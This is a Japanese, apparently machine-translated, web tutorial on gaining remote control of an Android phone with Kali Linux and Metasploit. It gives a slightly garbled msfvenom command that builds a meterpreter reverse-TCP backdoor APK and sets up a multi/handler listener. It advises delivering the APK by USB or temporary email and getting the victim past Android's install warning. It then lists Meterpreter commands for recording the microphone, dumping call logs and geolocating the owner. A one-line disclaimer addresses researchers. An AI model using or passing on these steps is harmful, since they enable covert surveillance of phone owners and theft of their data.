Linux
 Computer >> コンピューター >  >> システム >> Linux

KaliLinuxを使用してAndroidフォンにアクセスする方法

KaliLinuxを使用してAndroidフォンにアクセスする方法

Androidスマートフォンは、多くの場合、ほとんどの商用IoTガジェットへのゲートウェイです。 Nest Smokeアラームは、関連するAndroidアプリを介して管理されます。温度を制御するためのネストサーモスタットもそうです。スマートロック、ドアベルカム–ほとんどすべてのスマートデバイスにAlexaまたは他のマスターアプリからアクセスできます。誰かがそのようなAndroid携帯にリモートアクセスできるとしたらどうでしょうか?これは不可能だと思いますか?このために、KaliLinuxの「metasploit」を使用してAndroidフォンへのバックドアエントリを作成する方法の基本的なデモを行います。

:このチュートリアルは、セキュリティ研究者と愛好家を対象としています。許可なく誰かの電話をハッキングすることはお勧めしません。

背景

Kali Linuxでの作業を開始する前に、まずコンソール端末について理解する必要があります。

デバイスのファームウェアまたはオペレーティングシステムを対象とするように設計されたツールの包括的なリストを簡単にホストします。

ここでは、「MSFVenom」と呼ばれる一般的なツールの1つを使用して、Android携帯にウイルスを挿入します。ユーザーが選択したオプションに基づいて、複数の種類のペイロードを生成します。このエクスプロイトは、Windows、Android、OpenBSD、Solaris、JAVA、PHP、ゲームハードウェアなどの多くのプラットフォームで機能します。

AndroidMetasploitの起動

次の手順は、KaliLinuxシステムにMSFVenomをダウンロードする方法を示しています。

ターミナルを起動し、次のコマンドを入力します。

msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > /root/LOCATION/hackand.apk

ここでは、ペイロードは「Meterpreter」と呼ばれるエクスプロイト拡張機能を使用して起動されます。

KaliLinuxを使用してAndroidフォンにアクセスする方法

リスナーホストのIPアドレスを確認するには、新しいコンソールターミナルを開き、 ifconfigと入力します。 。通常、ポート4444は、トロイの木馬、エクスプロイト、およびウイルスに割り当てられます。

KaliLinuxを使用してAndroidフォンにアクセスする方法

IPアドレスが決まったら、前の画面に戻って詳細を入力します。

ファイル「hackand.apk」はデスクトップに保存され、Android携帯で使用される主なバックドアエクスプロイトです。

KaliLinuxを使用してAndroidフォンにアクセスする方法

次のステップでは、KaliLinuxで使用される一般的な侵入テストツールである「msfconsole」を起動します。これには、 service postgresql startと入力します 続いてmsfconsole 。 PostgreSQLは、コンソールが保存されているデータベースを指します。

KaliLinuxを使用してAndroidフォンにアクセスする方法

侵入ツールの準備ができたら、残りのエクスプロイトを起動できます。

KaliLinuxを使用してAndroidフォンにアクセスする方法

次に、「マルチハンドラ」と呼ばれる実行可能ファイルが使用されます。 

use multi/handler

エクスプロイトをコンソールに接続するには、以下の画像を参照してください。同じIPアドレスとポート番号が使用されます。

KaliLinuxを使用してAndroidフォンにアクセスする方法

次の段階では、msfvenomエクスプロイトが起動され、単純な exploreで初期化されます。 指図。次に、Androidフォンとなるターゲットを見つける必要があります。

KaliLinuxを使用してAndroidフォンにアクセスする方法

KaliLinuxターミナルとAndroidフォンの接続

以前にダウンロードしたhackand.apkファイルのサイズはわずか10KBです。ターゲットの電話にファイルを挿入する方法を見つける必要があります。 USBまたは一時的な電子メールサービスを使用してウイルスを転送できます。

通常、GmailやYahooなどのWebメールプロバイダーは、このウイルスに感染したファイルの携帯を拒否します。

ソフトウェアを挿入する前に、Androidが警告を表示します。ただし、「リスクを無視してインストールする」だけでよいため、インストールが完了するまでに20秒もかかりません。これにより、携帯電話がロック解除モードになっている場合、脅威はやや深刻になります。

KaliLinuxを使用してAndroidフォンにアクセスする方法

ここに示すように、ストレージの内容の変更、電話のスリープの防止、Wi-Fiの接続と切断、壁紙の設定など、電話に多くの損傷を与える可能性があります。

KaliLinuxを使用してAndroidフォンにアクセスする方法

APKファイルがインストールされると、電話内で巧妙に偽装することができます。

KaliLinuxを使用してAndroidフォンにアクセスする方法

これで、Kali Linuxターミナルで次のような多くのコマンドを使用して、電話を制御できます。リストは単純な<​​code>helpから入手できるため、実際に覚えておく必要はありません。 Meterpreterのオプション 。

  • record_mic :マイクを録音する
  • ダンプコールログ :通話記録を取得する
  • webcam_chat :ビデオチャットを開始する
  • geolocate :スマートフォンの現在地を取得する

ほとんどの高度なAndroidスマートフォンは、この悪意のあるアプリがインストールされるのを防ぎます。したがって、このエクスプロイトは通常、古いAndroidモデルで機能します。

考え

このチュートリアルでは、KaliLinuxを使用してAndroidスマートフォンにアクセスするための基本的な戦略を見ました。これは非常に単純なエクスプロイトですが、IoTセキュリティの観点からは大きな意味があります。

Kali Linuxのエクスプロイトについてどう思いますか?スマートフォンのセキュリティについてもっと慎重になりますか?コメントでお知らせください。


  1. Androidフォンをルート化する方法

    Android は、カスタマイズと変更の機能に関してユーザーに多くの自由を提供しますが、確かに制限がありました。たとえば、システム アプリはあまり制御できないものです。それらをアンインストールしたり、バックグラウンドでの実行を停止したりすることはできません.真のパワーとコントロールは、デバイスをルート化することによってのみ実現できます。この記事では、携帯電話をルート化することのさまざまな利点と、PC を使用して Android 携帯電話をルート化する方法について説明します。 Android 携帯をルート化する方法 はい、PC を使用して Android スマートフォンをルート化すること

  2. 携帯電話を使用してリモート デスクトップにアクセスする方法

    簡単な昼食のために急いで立ち去らなければならない状況に直面するかもしれませんが、タスクのためにオフィスのデスクトップにアクセスしたい場合があります。または、あなたがワークステーションから離れているときに、同僚が緊急のアドバイスを求めています。今何をする?この問題は、PC と携帯電話で Chrome リモート デスクトップ接続を使用することで非常に簡単に解決できます。どのように?下にスクロールして学びましょう! 次の手順では、2 段階のプロセスを実行する必要があります。1 つは PC で、もう 1 つは携帯電話 (Android または iPhone) です。ステップ 1 では、前者のデバイス